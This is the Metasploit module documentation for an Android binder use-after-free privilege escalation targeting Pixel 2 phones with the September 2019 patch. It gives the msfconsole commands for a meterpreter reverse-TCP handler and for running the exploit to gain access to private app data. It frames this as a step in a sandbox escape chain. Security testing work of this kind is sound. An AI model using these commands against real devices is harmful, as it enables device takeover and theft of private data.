cgranleese-r7
41 lines
2.2 KiB
Markdown
41 lines
2.2 KiB
Markdown
## Vulnerable Application
|
|
|
|
This exploit module currently targets a very specific build of Android on specific set of hardware targets:
|
|
|
|
- Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.
|
|
|
|
This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
|
|
|
|
One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken [older revisions to the device firmware](https://developers.google.com/android/images). This may be a firmware bug or intentional, but Google themselves do not appear to have an answer [for the problem](https://support.google.com/pixelphone/thread/14920605?hl=en). For testing, you may need a phone never updated to a later Android revision.
|
|
|
|
## Verification Steps
|
|
|
|
- Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:
|
|
|
|
`msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`
|
|
|
|
- Currently this only works on the Pixel 2 (and Pixel 2 XL) with september 2019 Security patch level. Validate the kernel version looks like this:
|
|
|
|
```
|
|
uname -a
|
|
Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
|
|
```
|
|
|
|
- Run the exploit:
|
|
|
|
```
|
|
msf exploit(multi/handler) > use exploit/android/local/binder_uaf
|
|
msf exploit(android/local/binder_uaf) > set LHOST IPADDR
|
|
msf exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
|
|
LPORT => 4448
|
|
msf exploit(android/local/binder_uaf) > set SESSION -1
|
|
SESSION => -1
|
|
msf exploit(android/local/binder_uaf) > run
|
|
```
|
|
|
|
- **Verify** the new session can read and write private application data (in /data/data/..../)
|
|
|
|
## Scenarios
|
|
|
|
This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.
|